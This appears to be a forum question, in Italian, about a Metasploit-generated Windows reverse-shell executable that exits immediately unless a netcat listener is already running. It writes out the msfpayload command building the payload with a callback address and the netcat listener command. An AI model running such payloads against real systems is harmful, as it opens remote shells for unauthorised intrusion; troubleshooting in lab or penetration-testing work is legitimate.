Sto usando Metasploit per generare un exploit shell_reverse_tcp usando il seguente comando:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe
Sul lato listener sto usando netcat.
Tutto è perfetto e se eseguo prima l'ascoltatore (nc -l -p 4444) e dopo di ciò apro lo exploit.exe. Ma se il mio listener non è in esecuzione ed eseguo lo exploit.exe, si avvia e si chiude immediatamente. Quindi, se prima eseguo il file exploit.exe e avvio il listener, non funziona. Ho anche provato ReverseConnectRetries ma questo non funziona neanche.
Quindi qual è il problema? Grazie per eventuali risposte.